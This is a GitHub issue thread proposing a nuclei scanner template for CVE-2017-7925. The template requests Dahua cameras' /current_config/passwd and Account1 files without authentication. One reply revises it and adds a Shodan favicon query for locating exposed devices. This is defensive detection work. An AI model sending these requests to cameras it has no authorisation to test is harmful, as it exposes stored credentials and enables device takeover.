### ISSUE TITLE
CVE-2017-7925

### ISSUE THREAD

**Issue by LindaRANDOM** [projectdiscovery/nuclei-templates#5639]
```
id: CVE-2017-7925

info:
  name: Dahua-Cameras-and-Surveillance
  author: none
  severity: critical
  description: This vulnerability has been modified since it was last analyzed by the NVD. It is awaiting reanalysis which may result in further changes to the information provided.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-7925
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-7925
    cwe-id: CWE-522
  tags: cve,cve2017,Dahua

requests:
  - method: GET
    path:
      - "{{BaseURL}}/current_config/passwd"
      - "{{BaseURL}}/current_config/Account1"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "SerialID"
          - "Password"
          - "administrator group"
          - "Users"
          - "Groups"
        part: body
        condition: and
```

**Comment by princechaddha** [comment]
Hi @LindaRANDOM, The response time to this issue was much longer than usual. Thank you for taking the time to create this issue and for contributing to the project 🍻

Do you have any references for this CVE?

**Comment by E1A** [comment]
Templates looks good, but the passwd file gets downloaded and is not detected by word. A vulnerable instance gives an 200 and a normal instance gives an 404. By accepting the 200 request, it only accepts vulnerable instances, there is no false-positive possible in this scenario because only this file is hosting here.

Template:
id: CVE-2017-7925

info:
  name: Dahua-Cameras-and-Surveillance
  author: E1A
  severity: critical
  description: This vulnerability has been modified since it was last analyzed by the NVD. It is awaiting reanalysis which may result in further changes to the information provided.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-7925
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-7925
    cwe-id: CWE-522
shodan-query: http.favicon.hash:2019488876
  tags: cve,cve2017,Dahua

requests:
  - method: GET
    path:
      - "{{BaseURL}}/current_config/passwd"
      - "{{BaseURL}}/current_config/Account1"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200


Proof:
![image](https://github.com/projectdiscovery/nuclei-templates/assets/57531297/8c9230fa-d783-498a-9316-8505f30fe301)

**Comment by ehsandeep** [comment]
@LindaRANDOM thank you for sharing this template, this is now added with https://github.com/projectdiscovery/nuclei-templates/pull/7687
